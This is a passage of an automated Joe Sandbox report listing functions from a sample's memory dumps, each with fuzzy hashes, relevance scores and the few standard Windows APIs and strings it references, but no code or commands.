Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2e84d6063765931f8c2bcfeae30b23b9fd07be31373d1add271e0be7a43a5f0
Instruction ID: 1346ca051b8f3ae05f6cd9f12d1c96c8ea2cb78061a88a7b92e753f243555ae1
Opcode Fuzzy Hash: f2e84d6063765931f8c2bcfeae30b23b9fd07be31373d1add271e0be7a43a5f0
Instruction Fuzzy Hash: 10F1F039718211CFC708CF28E89066AB7E2FB8A314F1A897EE59587391D735D845CB46

Function 0043C1BB Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d65c6177d3f11c1236b2d1de3e2188621574274234b2536812bfcf978a680cc
Instruction ID: 0e7167b407682e9e5ab36eddea359f6eea5b5d501de5e00f730aba32e4d40cae
Opcode Fuzzy Hash: 7d65c6177d3f11c1236b2d1de3e2188621574274234b2536812bfcf978a680cc
Instruction Fuzzy Hash: EEF10039718211CFC708CF28E8D066AB7E2FB8A314F1A897EE59587391D739D845CB46

Function 0043C1B9 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79e39bb27fd57b3f60fd1b44574b9ee5bf4cf9033f8996213be872d9c748f81f
Instruction ID: decbaec90041712f550677ea8d945c0106860918588fe3583585983a0f3182b3
Opcode Fuzzy Hash: 79e39bb27fd57b3f60fd1b44574b9ee5bf4cf9033f8996213be872d9c748f81f
Instruction Fuzzy Hash: 7BF10039718211CFC708CF28E8D066AB7E2FB8A314F1A897EE59587391D738D845CB46

Function 00436BA0 Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 415bbbf77e1a8f1a10e49d56b70627f93722907351ff4f8b0d2369c144aa72b8
Instruction ID: eca95be113115f17ca6e95483d8c2770677e9b79baf950b464ba56cdffcfe084
Opcode Fuzzy Hash: 415bbbf77e1a8f1a10e49d56b70627f93722907351ff4f8b0d2369c144aa72b8
Instruction Fuzzy Hash: 0AD177B56083019FC324CF24DC8162BB7E2EBC9718F16A52EE9C587351D7399C05C79A

Function 00415E22 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55abb05b1a0d531c35bff56ca429e3a4c08567927d9184103582735950ecaf5f
Instruction ID: 44486692b0116ea2576c3962e0ca59c335ee207b67aafded0410a17457c81d80
Opcode Fuzzy Hash: 55abb05b1a0d531c35bff56ca429e3a4c08567927d9184103582735950ecaf5f
Instruction Fuzzy Hash: 0B91C274204B40CFD725CF29D8906A7BBE2FB9A701F54846DD4DA8B796CB39E842CB14

Function 0043D150 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b3303443ded84c443cae4e7a2fcc34c95d716fc30aea301c55ea75719efa268
Instruction ID: d7e0a3c4e39d8f5867896841547065041c691a27e7aa5d21db2c2fbe6f74e8c4
Opcode Fuzzy Hash: 2b3303443ded84c443cae4e7a2fcc34c95d716fc30aea301c55ea75719efa268
Instruction Fuzzy Hash: D6A13431B083118FC7248F68E88066BB3E2EF98710F05953DED8697351DB39AC51C796

Function 00426751 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c73f4c95d51c6cda944f15e56322803fe35696758a813c97df91ac7ce30c19e
Instruction ID: 2ea93ce4085ce4fced07fc153a0242db4f38a11fd1d259fce15408463a6b3ad1
Opcode Fuzzy Hash: 7c73f4c95d51c6cda944f15e56322803fe35696758a813c97df91ac7ce30c19e
Instruction Fuzzy Hash: A5A12576A00611CFDB14CF65EC4136EB7B2FBC9314F5A453DD886A7394DB78A8028B89

Function 0043CDF0 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ac19b1bcf43694b47a2286c192302af901dc3915e512b527c72021d81092112
Instruction ID: bb52b08561b053b3b60a98453c1ea72ca1cf418b318c3f84e0d580f64f830ef0
Opcode Fuzzy Hash: 5ac19b1bcf43694b47a2286c192302af901dc3915e512b527c72021d81092112
Instruction Fuzzy Hash: 5291E336A083019FD7149F18D890A2BB3F2EFC9B14F1A952DE885AB351DB35DC52C786

Function 00421440 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ce32c750ef0cc3fbd684bc11e9d186197f3662fdf23b99a505db0a5e745683
Instruction ID: 4b0a94f8f4ab219a0e118b3c6352d93906a14ade8fc8c532c64973732c5f5217
Opcode Fuzzy Hash: 55ce32c750ef0cc3fbd684bc11e9d186197f3662fdf23b99a505db0a5e745683
Instruction Fuzzy Hash: B28114B1604311ABC720DF14DC81B6B77B0EFD1758F48482DE9868B3A1E379E909C76A

Function 00421C00 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e832e78a54abbdb54a3a7bec85ddd8321fb36da15bee22445486291825dc48
Instruction ID: e922d9fee0493bcbe28598090298c0fb96ffa6e6295199aa557820145953a066
Opcode Fuzzy Hash: a6e832e78a54abbdb54a3a7bec85ddd8321fb36da15bee22445486291825dc48
Instruction Fuzzy Hash: F75128A56502208BC7149F15EC92B7773B4EFA2374F49455AE8828B3A1F73CE904C7A5

Function 004291C3 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b27377063a1dcb35115b70c9622d04bb35c58c5fb7e262b5004f6f936003cdf
Instruction ID: 6b43cfcb4cfd3446b687511eb50b28b7ecb47c89a7a04df23d4dda8b6d92f375
Opcode Fuzzy Hash: 4b27377063a1dcb35115b70c9622d04bb35c58c5fb7e262b5004f6f936003cdf
Instruction Fuzzy Hash: C971FFB1A102669FEB54CF29DC02BAABFB0FB45320F5542ACD555AF392C7748842CBC5

Function 0040E35C Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5251fc695de10ea657e1b8699feebbec1dd710da2e2147a5656af8e5bbab9213
Instruction ID: 0649716271abe2f53c5fc7c7f4cda49f0e0f40f1dc930eea410b2d0626a89825
Opcode Fuzzy Hash: 5251fc695de10ea657e1b8699feebbec1dd710da2e2147a5656af8e5bbab9213
Instruction Fuzzy Hash: 1941D5346192009FD7188B25D59093FB7E2EB97B14F64993DD88663391C63ADC138B8E

Function 00417984 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 227c581fdcd6e26d2fae43994bf120bdb8fc194b86a2872c4e62d65689474a73
Instruction ID: 9a9a30ad456c6b05efd7a5cab2669dbc63bbc038e82c93c21506d9a9821c14e3
Opcode Fuzzy Hash: 227c581fdcd6e26d2fae43994bf120bdb8fc194b86a2872c4e62d65689474a73
Instruction Fuzzy Hash: 083157B1A453008BDB24CF28C8C236777F2BFA5314B18926DD4568F389E738E5048794

Function 0040E241 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 141426bc6609921238160f18c0127cdbd2e5962c18e6459098a22dcbeb19482f
Instruction ID: 60339eddc0173d1ec18e5eeb43bd1caa34ec5effa829d42d58abfd61bbba0c8f
Opcode Fuzzy Hash: 141426bc6609921238160f18c0127cdbd2e5962c18e6459098a22dcbeb19482f
Instruction Fuzzy Hash: 89313379609200AFD7084B14D941A3F7397EBD6728F68993DD84263391C63ADC238B8E

Function 00408080 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eec75bb5b9784e5abdd51e0ba578dd31662d51ed021dccbf6fb7c89fd332b71d
Instruction ID: acfd48111fbd9615f3bc449ef3c53ff6dca47a65e15afbcd4686033712ee79da
Opcode Fuzzy Hash: eec75bb5b9784e5abdd51e0ba578dd31662d51ed021dccbf6fb7c89fd332b71d
Instruction Fuzzy Hash: 923166395096F04ED3328D2C886007EBFA15DA610439A40FFD8F15F7C3C82ACA4A93A1

Function 00415D31 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ea2aa5f47587b70a709983ca6fd2a2b30d2ee54bf3d38f5c2ed490b02d76b34
Instruction ID: 54be0fac22394bf5e03cae6f7d24e31eefa285fb73965d2b5cdea1265568cae1
Opcode Fuzzy Hash: 2ea2aa5f47587b70a709983ca6fd2a2b30d2ee54bf3d38f5c2ed490b02d76b34
Instruction Fuzzy Hash: 6B210235500A00EFCB258F55D884ABBB7B3EBD6300F54942ED58617622C739AC82970D

Function 00428F6F Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568f38df33fd9aa8dd9503ba15e537947588866558ea7354307e5e884fa53f04
Instruction ID: c882f5bce52f99bcf362bc4032049ecb042a8ae086f53545e4d25fa3f5188a4c
Opcode Fuzzy Hash: 568f38df33fd9aa8dd9503ba15e537947588866558ea7354307e5e884fa53f04
Instruction Fuzzy Hash: 8D31CFF1E142649FDB54CF29D842B9A7FB0EB4A360F565298D455AF3A2C3708802CFC9

Function 004228D0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30baa3910366b7ac7d10cbcdc68a05bd4903404c944bb894baed93877427ccd
Instruction ID: 450d52cb387bc023e60d4c3b5a952c4616046fd10989ac4fedb9fbaaa68f9623
Opcode Fuzzy Hash: d30baa3910366b7ac7d10cbcdc68a05bd4903404c944bb894baed93877427ccd
Instruction Fuzzy Hash: 99213671A883618FD314CF15D8913AFBBA5EBC1740F15883CE4D56B380CAB998468B96

Function 0042C748 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ebf823db9cec30f63c443f4186414a6ba33a4c0adf3a9d51f64187fc2bac46
Instruction ID: e9f3e9650164601890ced0544c0f02b7729192584efcee19ecc91f8fead8134b
Opcode Fuzzy Hash: 17ebf823db9cec30f63c443f4186414a6ba33a4c0adf3a9d51f64187fc2bac46
Instruction Fuzzy Hash: B1110337785A528BD326CE29C9C1266FBA3AFD621071D816DC19687752C638A4068A44

Function 00433140 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 4e86f99d925bcada67c6dc231c8028c5e08e54cd8b9d58ecd4c9aeecd7b1336e
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 93110C33A091D40EC7168D3C8800565BFA30A97636F1D539AF4B49B2D6D62B8E8B8359

Function 004295E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ed6eb60af09c6b6b2b769e36e2ba9e7501cb0ddbaa3fc61a5cdb4d33fcc8789
Instruction ID: 2f9fd05e15a9df4ea57e59ebbdb4ad1c1921c334f53bb94ff2ebd427e50c56fb
Opcode Fuzzy Hash: 7ed6eb60af09c6b6b2b769e36e2ba9e7501cb0ddbaa3fc61a5cdb4d33fcc8789
Instruction Fuzzy Hash: 5701B5F170071157DB219E65E5C1B27B2E85F90718F08443ED88857342EB7DEC48C29D

Function 0040D417 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 153100944142508e07926a7404f87e241d5c7bb73a284bcc3fbba9b969bc058a
Instruction ID: c8dacb64f24bffcdf688004061929ff8f42ee351ddc99e66c0101c4e96c7fe83
Opcode Fuzzy Hash: 153100944142508e07926a7404f87e241d5c7bb73a284bcc3fbba9b969bc058a
Instruction Fuzzy Hash: 7911E174A142419FE718DF18DC41B7F73A2EBC6314F588A3DE486A3391DB78A8568B09

Function 004172AE Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ba1dd86ee031ffc1a041775e869174edd704c5735dbc39e9af328c62ed513e
Instruction ID: bea52cbcd65b622c50162f8ffc8062d65d78ba255181f1fbe369cbfdb75ee12b
Opcode Fuzzy Hash: b1ba1dd86ee031ffc1a041775e869174edd704c5735dbc39e9af328c62ed513e
Instruction Fuzzy Hash: 42D0C974904A4087C214EF11D951A76F3B1AB8A718F10282EE08B67692CE24FD44C75D

Function 0042669F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027bf55f418d85534eff5d9e91e9602374634e1dbf1ab012fce7b7876ecff7ea
Instruction ID: cd556697b7e3fac87e64a1387bd772149c9b0f4cf68e7cb9e3afc26c36cba7a9
Opcode Fuzzy Hash: 027bf55f418d85534eff5d9e91e9602374634e1dbf1ab012fce7b7876ecff7ea
Instruction Fuzzy Hash: FEA022ECC088808BCA00CF00B802330F238A28B20AF003838E08CF3203EA20F00C820E

Function 00430737 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00430761

Strings

w, xrefs: 00430793
z, xrefs: 004307C3
r, xrefs: 004307A3
~, xrefs: 004307B3
u, xrefs: 004307CB
n, xrefs: 0043077B

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitVariant
String ID: n$r$u$w$z$~
API String ID: 1927566239-3573990534
Opcode ID: f93af1845080e0c2662f79180b03bc063467f7becf3e08bc42346d01ba68d0ab
Instruction ID: 1b896553e77637ef5f26b5b42077bac7953384b2d098cbe4fbc9c7dbb3d5c9ff
Opcode Fuzzy Hash: f93af1845080e0c2662f79180b03bc063467f7becf3e08bc42346d01ba68d0ab
Instruction Fuzzy Hash: 65511931208B818BD7158E3CC894646BFE1AB96224F18879CD8AA4F7EAC779D415C761

Function 0042FF38 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 104COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0042FF5D

Strings

n, xrefs: 0042FF7A
w, xrefs: 0042FF92
r, xrefs: 0042FFA2
u, xrefs: 0042FFCA
~, xrefs: 0042FFB2
z, xrefs: 0042FFC2

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: InitVariant
String ID: n$r$u$w$z$~
API String ID: 1927566239-3573990534
Opcode ID: 396f0396f3a458675dce1994166e2eab495ad6a3eba382d8fde0f0946fb1810a
Instruction ID: 83156171ca65f2f7873478f56621f2fe8874ca19cad56d3c089c6bd1d4a34c80
Opcode Fuzzy Hash: 396f0396f3a458675dce1994166e2eab495ad6a3eba382d8fde0f0946fb1810a
Instruction Fuzzy Hash: C8412921208BC18ED725CF3CC884706BFA16B56224F08879DD9E98F7EBC279D515C762

Function 0031A222 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,0031A20D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0031A2C8
__alloca_probe_16.LIBCMT ref: 0031A383
__alloca_probe_16.LIBCMT ref: 0031A412
__freea.LIBCMT ref: 0031A45D
__freea.LIBCMT ref: 0031A463
__freea.LIBCMT ref: 0031A499
__freea.LIBCMT ref: 0031A49F
__freea.LIBCMT ref: 0031A4AF

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: d7dd6c5e4303ebb35bb2c1945a1be96bc296bc91ad598bb0c7003f992ff3f08c
Instruction ID: 47555198e367d50acf32ee267725bbf530a91942974d10cb5a6ac3a768dace16
Opcode Fuzzy Hash: d7dd6c5e4303ebb35bb2c1945a1be96bc296bc91ad598bb0c7003f992ff3f08c
Instruction Fuzzy Hash: C6712832A02A059BDF2B9F558C46BFF77BA9F4D312F254415E814AB381EB75CC808762

Function 003054C5 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0030550C
__alloca_probe_16.LIBCMT ref: 00305538
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00305577
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00305594
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003055D3
__alloca_probe_16.LIBCMT ref: 003055F0
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00305632
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00305655

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: bf54af2a09396e150b44b1651553705053e0db4b4eff2486d3e773355d51f280
Instruction ID: bf49fa0acad34eba26313d603ae602a8795d814c45e09c2ea133f05e128241fa
Opcode Fuzzy Hash: bf54af2a09396e150b44b1651553705053e0db4b4eff2486d3e773355d51f280
Instruction Fuzzy Hash: E551AE7260260AAFEF229F64CC55FBB7BA9EF40750F554429B9019A1D0DB32CD11CF90

Function 003061E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00306217
___except_validate_context_record.LIBVCRUNTIME ref: 0030621F
_ValidateLocalCookies.LIBCMT ref: 003062A8
__IsNonwritableInCurrentImage.LIBCMT ref: 003062D3
_ValidateLocalCookies.LIBCMT ref: 00306328

Strings

csm, xrefs: 003062BD

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f400ebd2a0721dfe954eb6acd94425a44feb9964b36d558e3cbef8628875f945
Instruction ID: 61d76a586d175b71ebb6ed10406724d84d94b436eda1ffd2c7403ee337718210
Opcode Fuzzy Hash: f400ebd2a0721dfe954eb6acd94425a44feb9964b36d558e3cbef8628875f945
Instruction Fuzzy Hash: AF41D534A022189FCF12DF68CCA2A9EBBB9EF45324F148955E8149B3D6C731DA11CBD0

Function 0030F469 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,0030F578,0030186A,?,00000000,003031E1,0030186C,?,0030F1F6,00000022,FlsSetValue,0031DFE0,8,2,003031E1), ref: 0030F52A

Strings

api-ms-, xrefs: 0030F4C0
ext-ms-, xrefs: 0030F4D4

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b038e82fb019213768dbdc1b74dd9ddd9b12dd35825b02cd3b35ae6c38ef3673
Instruction ID: a88b8f4b77c4ef0fc257a8c21cc85db617ec9982a19760142948aca2d6a3d40f
Opcode Fuzzy Hash: b038e82fb019213768dbdc1b74dd9ddd9b12dd35825b02cd3b35ae6c38ef3673
Instruction Fuzzy Hash: 3321D532A02211AFC7339F69EC55AAB775CAF46764F260134ED16A76D0E734EE01C6D0

Function 0031625D Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
